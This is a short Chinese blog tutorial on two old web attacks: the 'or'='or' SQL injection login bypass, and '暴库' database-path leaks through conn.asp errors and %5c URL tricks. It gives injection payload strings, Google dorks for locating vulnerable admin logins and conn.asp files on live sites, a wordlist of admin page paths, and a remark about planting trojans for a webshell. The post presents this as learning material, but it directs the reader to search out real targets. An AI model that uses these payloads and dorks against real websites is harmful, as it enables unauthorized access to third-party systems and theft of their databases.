学习脚本黑客:‘or’=‘or’和暴库漏洞攻击

‘or’=’or’攻击,也成绕过后台登陆,是一种简单的SQL注入手段


‘or’=’or’

该漏洞利用了在编程时逻辑上的考虑不足,以及没有对单引号进行过滤

其中,逻辑考虑不足是说在AND和OR上面没有考虑它们的关系,而单引号没有过滤则为漏洞提供了触发条件

该漏洞是有一系列写法,比如a'or'1=1--or1=1--

要利用这个漏洞就要先找到网站的后台(需要用到Google Hacking的技术)

intext:用户名 inurl:admin/login.asp

(补充)一些常见的后台文件

admin.asp
ad_login.asp
as_manage.asp
addmember.asp
adduser.asp
adduser.asp
asm_login.asp
asmin/asmin.asp
asmin/asmin_login.asp
asmin/index.asp
asmin/manage.asp
admin_admin.asp
admin_edit.asp
admin_index.asp
admin_login.asp
admin_main.asp
admin_pass.asp
asmin_user.asp
adminadduser.asp
adminlogin.asp
adminuser.asp
adminuser.asp
chkadmin.asp
login.asp
login.asp
login/admin.asp
login/index.asp
login/login.asap
user/admin.asp
user/index.asp

(以上,后缀名.asp可以换为.php等)

学习脚本黑客:‘or’=‘or’和暴库漏洞攻击_第1张图片

账号密码都输入’or’=’or’即可完成一次简单的攻击(饿)
但是基本上(≥90%不会成功,毕竟这个漏洞很老了该补的都补好了)
为例找到可以注入’or’=’or’的网页,需要构造出漂亮的Google搜索语句


暴库

所谓暴库,是指通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地

相比于之前的注入漏洞,暴库漏洞可以让攻击者获得WebShell,这就是相当于获得了网页的后门,可以绕过防火墙直接对数据库访问;另外如果采用的以脚本语言名为后缀的话(如 asp、php 等)那么可以直接往里面插入木马,直接得到 webshell,非常的方便

常见的暴库手段有“conn.asp”和“%5c”两种

conn.asp(数据库连接文件)暴库

也是老生常谈的手段了。

通过直接访问数据库连接文件conn.asp是服务器产生错误,从而通过该错误信息得到数据库的绝对路径

Let’s Google Hacking……

inurl:"conn.asp"

不出意外可以搜索到很多存在暴库漏洞的网站

%5c暴库

对于一些网站,我们只需要把最后一个/改成%5c就可以暴出它的数据库来
学习脚本黑客:‘or’=‘or’和暴库漏洞攻击_第2张图片
关于%5c暴库的原理涉及IIS配置文件,这个坑以后填上。(先占着)

你可能感兴趣的:(白帽子)